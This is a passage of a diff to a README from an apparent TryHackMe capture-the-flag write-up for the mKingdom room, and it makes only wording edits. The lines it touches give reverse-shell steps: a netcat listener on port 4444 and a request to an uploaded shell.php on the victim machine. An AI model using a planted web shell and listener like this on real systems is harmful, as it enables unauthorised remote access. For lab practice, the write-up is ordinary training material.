AnnaKu32/thm-rooms/mKingdom/README.md

 http://VICTIM_IP_ADRESS:85/app/castle/application/files/6217/4308/6870/shell.php
 ```

-## On the attacker machine
+## On the attacker's machine
 Start a listener.
 ```BASH
 nc -lvnp 4444
 ```

-Go back to browser and in new tab go to:
+Go back to browser and in the new tab go to:
 ```BASH
 http://VICTIM_IP_ADRESS:85/app/castle/application/files/6217/4308/6870/shell.php
 ```